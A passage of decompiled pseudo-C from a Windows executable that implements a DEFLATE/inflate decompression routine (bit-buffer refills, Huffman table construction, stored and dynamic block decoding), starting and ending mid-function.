                                                					_t425 = __ebx;
                                                					if( *(_t448 - 0x34) == 0) {
                                                						break;
                                                					}
                                                					L55:
                                                					__eax =  *(__ebp - 0x38);
                                                					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                					__ecx = __ebx;
                                                					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                					__ebx = __ebx + 8;
                                                					while(1) {
                                                						L56:
                                                						if(__ebx < 0xe) {
                                                							goto L0;
                                                						}
                                                						L57:
                                                						__eax =  *(__ebp - 0x40);
                                                						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                						__ecx = __eax;
                                                						__esi[1] = __eax;
                                                						__ecx = __eax & 0x0000001f;
                                                						if(__cl > 0x1d) {
                                                							L9:
                                                							_t443 = _t442 | 0xffffffff;
                                                							 *_t446 = 0x11;
                                                							L10:
                                                							_t446[0x147] =  *(_t448 - 0x40);
                                                							_t446[0x146] = _t425;
                                                							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                							L11:
                                                							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                							_t446[0x26ea] =  *(_t448 - 0x30);
                                                							E004067B2( *(_t448 + 8));
                                                							return _t443;
                                                						}
                                                						L58:
                                                						__eax = __eax & 0x000003e0;
                                                						if(__eax > 0x3a0) {
                                                							goto L9;
                                                						}
                                                						L59:
                                                						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                						__ebx = __ebx - 0xe;
                                                						_t94 =  &(__esi[2]);
                                                						 *_t94 = __esi[2] & 0x00000000;
                                                						 *__esi = 0xc;
                                                						while(1) {
                                                							L60:
                                                							__esi[1] = __esi[1] >> 0xa;
                                                							__eax = (__esi[1] >> 0xa) + 4;
                                                							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                								goto L68;
                                                							}
                                                							L61:
                                                							while(1) {
                                                								L64:
                                                								if(__ebx >= 3) {
                                                									break;
                                                								}
                                                								L62:
                                                								if( *(__ebp - 0x34) == 0) {
                                                									goto L182;
                                                								}
                                                								L63:
                                                								__eax =  *(__ebp - 0x38);
                                                								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                								__ecx = __ebx;
                                                								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                								__ebx = __ebx + 8;
                                                							}
                                                							L65:
                                                							__ecx = __esi[2];
                                                							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                							__ebx = __ebx - 3;
                                                							_t108 = __ecx + 0x407374; // 0x121110
                                                							__ecx =  *_t108;
                                                							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                							__ecx = __esi[1];
                                                							__esi[2] = __esi[2] + 1;
                                                							__eax = __esi[2];
                                                							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                								goto L64;
                                                							}
                                                							L66:
                                                							while(1) {
                                                								L68:
                                                								if(__esi[2] >= 0x13) {
                                                									break;
                                                								}
                                                								L67:
                                                								_t119 = __esi[2] + 0x407374; // 0x4000300
                                                								__eax =  *_t119;
                                                								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                								_t126 =  &(__esi[2]);
                                                								 *_t126 = __esi[2] + 1;
                                                							}
                                                							L69:
                                                							__ecx = __ebp - 8;
                                                							__edi =  &(__esi[0x143]);
                                                							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                							__eax = 0;
                                                							 *(__ebp - 8) = 0;
                                                							__eax =  &(__esi[3]);
                                                							 *__edi = 7;
                                                							__eax = E0040681A( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                							if(__eax != 0) {
                                                								L72:
                                                								 *__esi = 0x11;
                                                								while(1) {
                                                									L180:
                                                									_t396 =  *_t446;
                                                									if(_t396 > 0xf) {
                                                										break;
                                                									}
                                                									L1:
                                                									switch( *((intOrPtr*)(_t396 * 4 +  &M00406772))) {
                                                										case 0:
                                                											L101:
                                                											__eax = __esi[4] & 0x000000ff;
                                                											__esi[3] = __esi[4] & 0x000000ff;
                                                											__eax = __esi[5];
                                                											__esi[2] = __esi[5];
                                                											 *__esi = 1;
                                                											goto L102;
                                                										case 1:
                                                											L102:
                                                											__eax = __esi[3];
                                                											while(1) {
                                                												L105:
                                                												__eflags = __ebx - __eax;
                                                												if(__ebx >= __eax) {
                                                													break;
                                                												}
                                                												L103:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L104:
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                												__ecx = __ebx;
                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L106:
                                                											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
                                                											__eax = __eax &  *(__ebp - 0x40);
                                                											__ecx = __esi[2];
                                                											__eax = __esi[2] + __eax * 4;
                                                											__ecx =  *(__eax + 1) & 0x000000ff;
                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                											__ecx =  *__eax & 0x000000ff;
                                                											__eflags = __ecx;
                                                											if(__ecx != 0) {
                                                												L108:
                                                												__eflags = __cl & 0x00000010;
                                                												if((__cl & 0x00000010) == 0) {
                                                													L110:
                                                													__eflags = __cl & 0x00000040;
                                                													if((__cl & 0x00000040) == 0) {
                                                														goto L125;
                                                													}
                                                													L111:
                                                													__eflags = __cl & 0x00000020;
                                                													if((__cl & 0x00000020) == 0) {
                                                														goto L9;
                                                													}
                                                													L112:
                                                													 *__esi = 7;
                                                													goto L180;
                                                												}
                                                												L109:
                                                												__esi[2] = __ecx;
                                                												__esi[1] = __eax;
                                                												 *__esi = 2;
                                                												goto L180;
                                                											}
                                                											L107:
                                                											__esi[2] = __eax;
                                                											 *__esi = 6;
                                                											goto L180;
                                                										case 2:
                                                											L113:
                                                											__eax = __esi[2];
                                                											while(1) {
                                                												L116:
                                                												__eflags = __ebx - __eax;
                                                												if(__ebx >= __eax) {
                                                													break;
                                                												}
                                                												L114:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L115:
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                												__ecx = __ebx;
                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L117:
                                                											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                											__esi[1] = __esi[1] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                											__ecx = __eax;
                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                											__ebx = __ebx - __eax;
                                                											__eflags = __ebx;
                                                											__eax = __esi[4] & 0x000000ff;
                                                											__esi[3] = __esi[4] & 0x000000ff;
                                                											__eax = __esi[6];
                                                											__esi[2] = __esi[6];
                                                											 *__esi = 3;
                                                											goto L118;
                                                										case 3:
                                                											L118:
                                                											__eax = __esi[3];
                                                											while(1) {
                                                												L121:
                                                												__eflags = __ebx - __eax;
                                                												if(__ebx >= __eax) {
                                                													break;
                                                												}
                                                												L119:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L120:
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                												__ecx = __ebx;
                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L122:
                                                											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
                                                											__eax = __eax &  *(__ebp - 0x40);
                                                											__ecx = __esi[2];
                                                											__eax = __esi[2] + __eax * 4;
                                                											__ecx =  *(__eax + 1) & 0x000000ff;
                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                											__ecx =  *__eax & 0x000000ff;
                                                											__eflags = __cl & 0x00000010;
                                                											if((__cl & 0x00000010) == 0) {
                                                												L124:
                                                												__eflags = __cl & 0x00000040;
                                                												if((__cl & 0x00000040) != 0) {
                                                													goto L9;
                                                												}
                                                												L125:
                                                												__esi[3] = __ecx;
                                                												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                												__esi[2] = __eax;
                                                												goto L180;
                                                											}
                                                											L123:
                                                											__esi[2] = __ecx;
                                                											__esi[3] = __eax;
                                                											 *__esi = 4;
                                                											goto L180;
                                                										case 4:
                                                											L126:
                                                											__eax = __esi[2];
                                                											while(1) {
                                                												L129:
                                                												__eflags = __ebx - __eax;
                                                												if(__ebx >= __eax) {
                                                													break;
                                                												}
                                                												L127:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L128:
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                												__ecx = __ebx;
                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L130:
                                                											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                											__esi[3] = __esi[3] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                											__ecx = __eax;
                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                											__ebx = __ebx - __eax;
                                                											__eflags = __ebx;
                                                											 *__esi = 5;
                                                											goto L131;
                                                										case 5:
                                                											L131:
                                                											__eax =  *(__ebp - 0x30);
                                                											__edx = __esi[3];
                                                											__eax = __eax - __esi;
                                                											__ecx = __eax - __esi - 0x1ba0;
                                                											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                												__ecx = __eax;
                                                												__ecx = __eax - __edx;
                                                												__eflags = __ecx;
                                                											} else {
                                                												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                												__ecx = __esi[0x26e8] - __edx - __esi;
                                                												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                											}
                                                											__eflags = __esi[1];
                                                											 *(__ebp - 0x20) = __ecx;
                                                											if(__esi[1] != 0) {
                                                												L135:
                                                												__edi =  *(__ebp - 0x2c);
                                                												do {
                                                													L136:
                                                													__eflags = __edi;
                                                													if(__edi != 0) {
                                                														goto L152;
                                                													}
                                                													L137:
                                                													__edi = __esi[0x26e8];
                                                													__eflags = __eax - __edi;
                                                													if(__eax != __edi) {
                                                														L143:
                                                														__esi[0x26ea] = __eax;
                                                														__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                                                														__eax = __esi[0x26ea];
                                                														__ecx = __esi[0x26e9];
                                                														__eflags = __eax - __ecx;
                                                														 *(__ebp - 0x30) = __eax;
                                                														if(__eax >= __ecx) {
                                                															__edi = __esi[0x26e8];
                                                															__edi = __esi[0x26e8] - __eax;
                                                															__eflags = __edi;
                                                														} else {
                                                															__ecx = __ecx - __eax;
                                                															__edi = __ecx - __eax - 1;
                                                														}
                                                														__edx = __esi[0x26e8];
                                                														__eflags = __eax - __edx;
                                                														 *(__ebp - 8) = __edx;
                                                														if(__eax == __edx) {
                                                															__edx =  &(__esi[0x6e8]);
                                                															__eflags = __ecx - __edx;
                                                															if(__ecx != __edx) {
                                                																__eax = __edx;
                                                																__eflags = __eax - __ecx;
                                                																 *(__ebp - 0x30) = __eax;
                                                																if(__eax >= __ecx) {
                                                																	__edi =  *(__ebp - 8);
                                                																	__edi =  *(__ebp - 8) - __eax;
                                                																	__eflags = __edi;
                                                																} else {
                                                																	__ecx = __ecx - __eax;
                                                																	__edi = __ecx;
                                                																}
                                                															}
                                                														}
                                                														__eflags = __edi;
                                                														if(__edi == 0) {
                                                															goto L183;
                                                														} else {
                                                															goto L152;
                                                														}
                                                													}
                                                													L138:
                                                													__ecx = __esi[0x26e9];
                                                													__edx =  &(__esi[0x6e8]);
                                                													__eflags = __ecx - __edx;
                                                													if(__ecx == __edx) {
                                                														goto L143;
                                                													}
                                                													L139:
                                                													__eax = __edx;
                                                													__eflags = __eax - __ecx;
                                                													if(__eax >= __ecx) {
                                                														__edi = __edi - __eax;
                                                														__eflags = __edi;
                                                													} else {
                                                														__ecx = __ecx - __eax;
                                                														__edi = __ecx;
                                                													}
                                                													__eflags = __edi;
                                                													if(__edi == 0) {
                                                														goto L143;
                                                													}
                                                													L152:
                                                													__ecx =  *(__ebp - 0x20);
                                                													 *__eax =  *__ecx;
                                                													__eax = __eax + 1;
                                                													__ecx = __ecx + 1;
                                                													__edi = __edi - 1;
                                                													__eflags = __ecx - __esi[0x26e8];
                                                													 *(__ebp - 0x30) = __eax;
                                                													 *(__ebp - 0x20) = __ecx;
                                                													 *(__ebp - 0x2c) = __edi;
                                                													if(__ecx == __esi[0x26e8]) {
                                                														__ecx =  &(__esi[0x6e8]);
                                                														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                													}
                                                													_t357 =  &(__esi[1]);
                                                													 *_t357 = __esi[1] - 1;
                                                													__eflags =  *_t357;
                                                												} while ( *_t357 != 0);
                                                											}
                                                											goto L23;
                                                										case 6:
                                                											L156:
                                                											__eax =  *(__ebp - 0x2c);
                                                											__edi =  *(__ebp - 0x30);
                                                											__eflags = __eax;
                                                											if(__eax != 0) {
                                                												L172:
                                                												__cl = __esi[2];
                                                												 *__edi = __cl;
                                                												__edi = __edi + 1;
                                                												__eax = __eax - 1;
                                                												 *(__ebp - 0x30) = __edi;
                                                												 *(__ebp - 0x2c) = __eax;
                                                												goto L23;
                                                											}
                                                											L157:
                                                											__ecx = __esi[0x26e8];
                                                											__eflags = __edi - __ecx;
                                                											if(__edi != __ecx) {
                                                												L163:
                                                												__esi[0x26ea] = __edi;
                                                												__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                                                												__edi = __esi[0x26ea];
                                                												__ecx = __esi[0x26e9];
                                                												__eflags = __edi - __ecx;
                                                												 *(__ebp - 0x30) = __edi;
                                                												if(__edi >= __ecx) {
                                                													__eax = __esi[0x26e8];
                                                													__eax = __esi[0x26e8] - __edi;
                                                													__eflags = __eax;
                                                												} else {
                                                													__ecx = __ecx - __edi;
                                                													__eax = __ecx - __edi - 1;
                                                												}
                                                												__edx = __esi[0x26e8];
                                                												__eflags = __edi - __edx;
                                                												 *(__ebp - 8) = __edx;
                                                												if(__edi == __edx) {
                                                													__edx =  &(__esi[0x6e8]);
                                                													__eflags = __ecx - __edx;
                                                													if(__ecx != __edx) {
                                                														__edi = __edx;
                                                														__eflags = __edi - __ecx;
                                                														 *(__ebp - 0x30) = __edi;
                                                														if(__edi >= __ecx) {
                                                															__eax =  *(__ebp - 8);
                                                															__eax =  *(__ebp - 8) - __edi;
                                                															__eflags = __eax;
                                                														} else {
                                                															__ecx = __ecx - __edi;
                                                															__eax = __ecx;
                                                														}
                                                													}
                                                												}
                                                												__eflags = __eax;
                                                												if(__eax == 0) {
                                                													goto L183;
                                                												} else {
                                                													goto L172;
                                                												}
                                                											}
                                                											L158:
                                                											__eax = __esi[0x26e9];
                                                											__edx =  &(__esi[0x6e8]);
                                                											__eflags = __eax - __edx;
                                                											if(__eax == __edx) {
                                                												goto L163;
                                                											}
                                                											L159:
                                                											__edi = __edx;
                                                											__eflags = __edi - __eax;
                                                											if(__edi >= __eax) {
                                                												__ecx = __ecx - __edi;
                                                												__eflags = __ecx;
                                                												__eax = __ecx;
                                                											} else {
                                                												__eax = __eax - __edi;
                                                												__eax = __eax - 1;
                                                											}
                                                											__eflags = __eax;
                                                											if(__eax != 0) {
                                                												goto L172;
                                                											} else {
                                                												goto L163;
                                                											}
                                                										case 7:
                                                											L173:
                                                											__eflags = __ebx - 7;
                                                											if(__ebx > 7) {
                                                												__ebx = __ebx - 8;
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                												_t380 = __ebp - 0x38;
                                                												 *_t380 =  *(__ebp - 0x38) - 1;
                                                												__eflags =  *_t380;
                                                											}
                                                											goto L175;
                                                										case 8:
                                                											L4:
                                                											while(_t425 < 3) {
                                                												if( *(_t448 - 0x34) == 0) {
                                                													goto L182;
                                                												} else {
                                                													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                													_t425 = _t425 + 8;
                                                													continue;
                                                												}
                                                											}
                                                											_t425 = _t425 - 3;
                                                											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                											asm("sbb ecx, ecx");
                                                											_t408 = _t406 >> 1;
                                                											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                											if(_t408 == 0) {
                                                												L24:
                                                												 *_t446 = 9;
                                                												_t436 = _t425 & 0x00000007;
                                                												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                												_t425 = _t425 - _t436;
                                                												goto L180;
                                                											}
                                                											L6:
                                                											_t411 = _t408 - 1;
                                                											if(_t411 == 0) {
                                                												L13:
                                                												__eflags =  *0x42daf0;
                                                												if( *0x42daf0 != 0) {
                                                													L22:
                                                													_t412 =  *0x409364; // 0x9
                                                													_t446[4] = _t412;
                                                													_t413 =  *0x409368; // 0x5
                                                													_t446[4] = _t413;
                                                													_t414 =  *0x42c96c; // 0x0
                                                													_t446[5] = _t414;
                                                													_t415 =  *0x42c968; // 0x0
                                                													_t446[6] = _t415;
                                                													L23:
                                                													 *_t446 =  *_t446 & 0x00000000;
                                                													goto L180;
                                                												} else {
                                                													_t26 = _t448 - 8;
                                                													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                													__eflags =  *_t26;
                                                													_t416 = 0x42c970;
                                                													goto L15;
                                                													L20:
                                                													 *_t416 = _t438;
                                                													_t416 = _t416 + 4;
                                                													__eflags = _t416 - 0x42cdf0;
                                                													if(_t416 < 0x42cdf0) {
                                                														L15:
                                                														__eflags = _t416 - 0x42cbac;
                                                														_t438 = 8;
                                                														if(_t416 > 0x42cbac) {
                                                															__eflags = _t416 - 0x42cd70;
                                                															if(_t416 >= 0x42cd70) {
                                                																__eflags = _t416 - 0x42cdd0;
                                                																if(_t416 < 0x42cdd0) {
                                                																	_t438 = 7;
                                                																}
                                                															} else {
                                                																_t438 = 9;
                                                															}
                                                														}
                                                														goto L20;
                                                													} else {
                                                														E0040681A(0x42c970, 0x120, 0x101, 0x407388, 0x4073c8, 0x42c96c, 0x409364, 0x42d270, _t448 - 8);
                                                														_push(0x1e);
                                                														_pop(_t440);
                                                														_push(5);
                                                														_pop(_t419);
                                                														memset(0x42c970, _t419, _t440 << 2);
                                                														_t450 = _t450 + 0xc;
                                                														_t442 = 0x42c970 + _t440;
                                                														E0040681A(0x42c970, 0x1e, 0, 0x407408, 0x407444, 0x42c968, 0x409368, 0x42d270, _t448 - 8);
                                                														 *0x42daf0 =  *0x42daf0 + 1;
                                                														__eflags =  *0x42daf0;
                                                														goto L22;
                                                													}
                                                												}
                                                											}
                                                											L7:
                                                											_t423 = _t411 - 1;
                                                											if(_t423 == 0) {
                                                												 *_t446 = 0xb;
                                                												goto L180;
                                                											}
                                                											L8:
                                                											if(_t423 != 1) {
                                                												goto L180;
                                                											}
                                                											goto L9;
                                                										case 9:
                                                											while(1) {
                                                												L27:
                                                												__eflags = __ebx - 0x10;
                                                												if(__ebx >= 0x10) {
                                                													break;
                                                												}
                                                												L25:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L26:
                                                												__eax =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__ecx = __ebx;
                                                												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L28:
                                                											__eax =  *(__ebp - 0x40);
                                                											__ebx = 0;
                                                											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                											 *(__ebp - 0x40) = 0;
                                                											__eflags = __eax;
                                                											__esi[1] = __eax;
                                                											if(__eax == 0) {
                                                												goto L53;
                                                											}
                                                											L29:
                                                											_push(0xa);
                                                											_pop(__eax);
                                                											goto L54;
                                                										case 0xa:
                                                											L30:
                                                											__eflags =  *(__ebp - 0x34);
                                                											if( *(__ebp - 0x34) == 0) {
                                                												goto L182;
                                                											}
                                                											L31:
                                                											__eax =  *(__ebp - 0x2c);
                                                											__eflags = __eax;
                                                											if(__eax != 0) {
                                                												L48:
                                                												__eflags = __eax -  *(__ebp - 0x34);
                                                												if(__eax >=  *(__ebp - 0x34)) {
                                                													__eax =  *(__ebp - 0x34);
                                                												}
                                                												__ecx = __esi[1];
                                                												__eflags = __ecx - __eax;
                                                												__edi = __ecx;
                                                												if(__ecx >= __eax) {
                                                													__edi = __eax;
                                                												}
                                                												__eax = E004055C3( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                												_t80 =  &(__esi[1]);
                                                												 *_t80 = __esi[1] - __edi;
                                                												__eflags =  *_t80;
                                                												if( *_t80 == 0) {
                                                													L53:
                                                													__eax = __esi[0x145];
                                                													L54:
                                                													 *__esi = __eax;
                                                												}
                                                												goto L180;
                                                											}
                                                											L32:
                                                											__ecx = __esi[0x26e8];
                                                											__edx =  *(__ebp - 0x30);
                                                											__eflags = __edx - __ecx;
                                                											if(__edx != __ecx) {
                                                												L38:
                                                												__esi[0x26ea] = __edx;
                                                												__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                                                												__edx = __esi[0x26ea];
                                                												__ecx = __esi[0x26e9];
                                                												__eflags = __edx - __ecx;
                                                												 *(__ebp - 0x30) = __edx;
                                                												if(__edx >= __ecx) {
                                                													__eax = __esi[0x26e8];
                                                													__eax = __esi[0x26e8] - __edx;
                                                													__eflags = __eax;
                                                												} else {
                                                													__ecx = __ecx - __edx;
                                                													__eax = __ecx - __edx - 1;
                                                												}
                                                												__edi = __esi[0x26e8];
                                                												 *(__ebp - 0x2c) = __eax;
                                                												__eflags = __edx - __edi;
                                                												if(__edx == __edi) {
                                                													__edx =  &(__esi[0x6e8]);
                                                													__eflags = __edx - __ecx;
                                                													if(__eflags != 0) {
                                                														 *(__ebp - 0x30) = __edx;
                                                														if(__eflags >= 0) {
                                                															__edi = __edi - __edx;
                                                															__eflags = __edi;
                                                															__eax = __edi;
                                                														} else {
                                                															__ecx = __ecx - __edx;
                                                															__eax = __ecx;
                                                														}
                                                														 *(__ebp - 0x2c) = __eax;
                                                													}
                                                												}
                                                												__eflags = __eax;
                                                												if(__eax == 0) {
                                                													goto L183;
                                                												} else {
                                                													goto L48;
                                                												}
                                                											}
                                                											L33:
                                                											__eax = __esi[0x26e9];
                                                											__edi =  &(__esi[0x6e8]);
                                                											__eflags = __eax - __edi;
                                                											if(__eax == __edi) {
                                                												goto L38;
                                                											}
                                                											L34:
                                                											__edx = __edi;
                                                											__eflags = __edx - __eax;
                                                											 *(__ebp - 0x30) = __edx;
                                                											if(__edx >= __eax) {
                                                												__ecx = __ecx - __edx;
                                                												__eflags = __ecx;
                                                												__eax = __ecx;
                                                											} else {
                                                												__eax = __eax - __edx;
                                                												__eax = __eax - 1;
                                                											}
                                                											__eflags = __eax;
                                                											 *(__ebp - 0x2c) = __eax;
                                                											if(__eax != 0) {
                                                												goto L48;
                                                											} else {
                                                												goto L38;
                                                											}
                                                										case 0xb:
                                                											goto L56;
                                                										case 0xc:
                                                											L60:
                                                											__esi[1] = __esi[1] >> 0xa;
                                                											__eax = (__esi[1] >> 0xa) + 4;
                                                											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                												goto L68;
                                                											}
                                                											goto L61;
                                                										case 0xd:
                                                											while(1) {
                                                												L93:
                                                												__eax = __esi[1];
                                                												__ecx = __esi[2];
                                                												__edx = __eax;
                                                												__eax = __eax & 0x0000001f;
                                                												__edx = __edx >> 5;
                                                												__eax = __edx + __eax + 0x102;
                                                												__eflags = __esi[2] - __eax;
                                                												if(__esi[2] >= __eax) {
                                                													break;
                                                												}
                                                												L73:
                                                												__eax = __esi[0x143];
                                                												while(1) {
                                                													L76:
                                                													__eflags = __ebx - __eax;
                                                													if(__ebx >= __eax) {
                                                														break;
                                                													}
                                                													L74:
                                                													__eflags =  *(__ebp - 0x34);
                                                													if( *(__ebp - 0x34) == 0) {
                                                														goto L182;
                                                													}
                                                													L75:
                                                													__ecx =  *(__ebp - 0x38);
                                                													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                													__ecx = __ebx;
                                                													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                													__ebx = __ebx + 8;
                                                													__eflags = __ebx;
                                                												}
                                                												L77:
                                                												__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
                                                												__eax = __eax &  *(__ebp - 0x40);
                                                												__ecx = __esi[0x144];
                                                												__eax = __esi[0x144] + __eax * 4;
                                                												__edx =  *(__eax + 1) & 0x000000ff;
                                                												__eax =  *(__eax + 2) & 0x0000ffff;
                                                												__eflags = __eax - 0x10;
                                                												 *(__ebp - 0x14) = __eax;
                                                												if(__eax >= 0x10) {
                                                													L79:
                                                													__eflags = __eax - 0x12;
                                                													if(__eax != 0x12) {
                                                														__eax = __eax + 0xfffffff2;
                                                														 *(__ebp - 8) = 3;
                                                													} else {
                                                														_push(7);
                                                														 *(__ebp - 8) = 0xb;
                                                														_pop(__eax);
                                                													}
                                                													while(1) {
                                                														L84:
                                                														__ecx = __eax + __edx;
                                                														__eflags = __ebx - __eax + __edx;
                                                														if(__ebx >= __eax + __edx) {
                                                															break;
                                                														}
                                                														L82:
                                                														__eflags =  *(__ebp - 0x34);
                                                														if( *(__ebp - 0x34) == 0) {
                                                															goto L182;
                                                														}
                                                														L83:
                                                														__ecx =  *(__ebp - 0x38);
                                                														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                														__ecx = __ebx;
                                                														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
